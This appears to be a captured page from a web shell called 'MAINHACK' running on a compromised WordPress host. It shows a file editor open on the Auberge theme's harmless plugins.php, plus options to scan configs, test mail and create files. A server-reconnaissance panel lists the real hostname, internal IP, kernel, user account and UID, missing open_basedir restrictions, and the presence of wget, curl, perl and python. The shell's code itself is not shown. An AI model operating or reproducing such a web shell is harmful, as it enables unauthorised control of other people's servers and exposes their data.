[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: plugins.php
<?php /** * Plugins suggestions * * @package Auberge * @copyright WebMan Design, Oliver Juhas * * @since 1.0 * @version 2.8.0 * * Contents: * * - 10) Functions */ /** * 10) Functions */ /** * Register the required plugins for the theme * * @link https://github.com/thomasgriffin/TGM-Plugin-Activation/blob/master/example.php */ if ( ! function_exists( 'wm_plugins_suggestions' ) ) { function wm_plugins_suggestions() { /** * Array of plugin arrays. Required keys are name and slug. * If the source is NOT from the .org repo, then source is also required. */ $plugins = apply_filters( 'wmhook_wm_plugins_suggestions-plugins', array( /** * WordPress Repository plugins */ // Recommended 'jetpack' => array( 'name' => esc_html__( 'Jetpack by WordPress.com (adds theme features)', 'auberge' ), 'slug' => 'jetpack', 'required' => false, ), 'beaver-builder' => array( 'name' => esc_html__( 'Beaver Builder (easy page builder)', 'auberge' ), 'slug' => 'beaver-builder-lite-version', 'required' => false, 'is_callable' => 'FLBuilder::init', ), 'advanced-custom-fields' => array( 'name' => esc_html__( 'Advanced Custom Fields (easy page setup)', 'auberge' ), 'slug' => 'advanced-custom-fields', 'required' => false, 'is_callable' => 'register_field_group', ), 'one-click-demo-import' => array( 'name' => esc_html__( 'One Click Demo Import (for installing theme demo content)', 'auberge' ), 'slug' => 'one-click-demo-import', 'required' => false, ), 'classic-widgets' => array( 'name' => esc_html_x( 'Classic Widgets', 'Plugin name.', 'auberge' ), 'description' => esc_html__( 'Improves widgets management screen.', 'auberge' ) . ' ' . esc_html__( 'Restores the previous WordPress widgets settings screens.', 'auberge' ) . ' ' . esc_html__( 'Sidebars and widgets are not going to be used in fully block themes in the future, so if your website still uses sidebars, it is better to use this plugin to enable classic user interface.', 'auberge' ), 'slug' => 'classic-widgets', 'required' => false, ), ) ); /** * Array of configuration settings */ $config = apply_filters( 'wmhook_wm_plugins_suggestions-config', array() ); /** * Actual action... */ tgmpa( $plugins, $config ); } } // /wm_plugins_suggestions add_action( 'tgmpa_register', 'wm_plugins_suggestions' );
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: webm010.cluster103.gra.hosting.ovh.net
Server IP: 10.103.20.10
PHP Version: 7.4.33
Server Software: Apache
System: Linux webm010.cluster103.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
HDD Total: 14.32 GB
HDD Free: 8.45 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
Exists
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: cuisinesj
User ID (UID): 17129
Group ID (GID): 100
Script Owner UID: 17129
Current Dir Owner: 17129